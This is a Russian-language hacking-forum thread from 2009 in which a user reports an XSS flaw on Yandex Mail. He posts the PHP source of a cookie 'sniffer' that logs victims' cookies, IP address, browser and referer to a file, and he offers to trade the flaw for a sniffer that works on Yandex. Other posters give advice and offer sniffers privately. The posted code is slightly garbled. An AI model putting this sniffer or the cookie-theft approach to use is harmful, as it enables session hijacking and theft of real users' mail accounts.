Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   E-Mail (https://forum.antichat.xyz/forumdisplay.php?f=14)
-   -   Активная xss на Яндекс (https://forum.antichat.xyz/showthread.php?t=143885)

satana-fu 26.09.2009 21:41

Активная xss на Яндекс
 
нашел полуактивную xss на яндекс. Пытаюсь подставить сниффер, не получается, вернее при запросе (document.cookie) все кукисы выдаются, а при замене запроса на сниффер, кукисы на сниффер не приходят.

Готов поделиться xss с тем, кто подскажет работающий сниффер для яндекса (поделюсь xss после проверки снифа), использовал стандартный от Kaniq и этот сниф, но кукисы не пришли

PHP код:

<?PHP  
$Cookies 
UrlDecode(getenv("QUERY_STRING"));  
$Date date("d-m-y H:i:s"time());  
$browser getenv("HTTP_USER_AGENT");  
$ref getenv("HTTP_REFERER");      
$ip getenv("REMOTE_ADDR");  
$text 
$Cookies:  
$Date:  
$browser:  
$ref:  
$ip:  
$query";  

$filelog fopen("base.php","a+");  
fwrite($filelog,"\n $text \n"); 
fclose($filelog);  
header('Location: http://somesite.ru');     
?>

На майле сниффер работает, на яндексе не работает. :rolleyes:

Подсказка сниффера тут, помощь в реализации в аську.

warlok 27.09.2009 17:43

Цитата:

На майле сниффер работает, на яндексе не работает.
ну и как там может быть?)) ты скорей всего неправильно составил свою xss, тя гдето фильтры режут.

Neogan 27.09.2009 18:57

в личку черкни отличный сниф кину

JOHNik 28.09.2009 01:08

Цитата:

Сообщение от satana-fu
На майле сниффер работает, на яндексе не работает. :rolleyes:
.

Снифферу пох где работать, надо уметь пользоваться просто )


Время: 09:34